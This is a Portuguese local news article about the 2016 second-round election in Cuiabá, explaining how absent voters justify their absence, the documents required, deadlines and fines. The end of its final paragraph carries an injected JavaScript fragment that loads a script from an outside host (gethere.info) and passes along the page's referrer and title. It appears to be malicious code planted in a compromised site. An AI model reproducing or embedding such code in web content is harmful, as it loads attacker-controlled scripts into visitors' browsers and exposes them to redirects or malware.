Capa / Cidades / Segundo turno: Cartório eleitoral vai abrir durante o período de votação para justificativa

Segundo turno: Cartório eleitoral vai abrir durante o período de votação para justificativa


arquivos_250_conteudo_posts_451997_jpeg_350_350_1_0__Da Redação

Eleições 2016: Cuiabá é o único município de Mato Grosso que terá o segundo turno. Quase 416 mil eleitores deverão, no dia 30 de outubro, comparecer ao local de votação para o exercício do voto. Quem estiver fora da capital (ou qualquer lugar do país aonde houver segundo turno e lá estiver inscrito) no dia 30, deve justificar o seu voto. O eleitor que no dia do pleito estiver fora de seu domicílio eleitoral deve justificar a ausência às urnas nos cartórios eleitorais da cidade que estiver. Em Alta Floresta o cartório funcionará durante o dia 30 até as 17h.

Para justificar o voto é necessário apresentar um documento oficial com foto em um posto de justificativa. Não é obrigatório portar o título de eleitor, no entanto, é preciso saber o número da inscrição eleitoral constante nesse documento, pois essa informação é exigida no formulário de Requerimento de Justificativa Eleitoral (RJE), cujos campos devem ser preenchidos corretamente.

Se no dia do pleito o eleitor estiver em município onde acontece o 2º turno, a justificativa pode ser apresentada em qualquer local de votação, como é o caso de Cuiabá, onde todos os seus 162 locais de votação estarão aptos a receber os formulários da justificativa.

O eleitor que não votar e nem justificar poderá fazê-lo no prazo de 60 dias a contar do dia da realização do pleito no qual se ausentou – cada turno é considerado um pleito. Essa justificativa só é aceita pelo juiz eleitoral quando o eleitor apresenta documentos que comprovam que de fato foi impossível, por motivos de força maior, comparecer às urnas e/ou justificar.

O eleitor que deixar de votar e não justificar incorrerá em multa imposta pelo juiz eleitoral e ficará impedido de obter a certidão de quitação eleitoral, documento que é exigido para o exercício de alguns direitos como, inscrever-se em concurso ou prova para cargo ou função pública, investir-se ou empossar-se neles, dentre outros.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top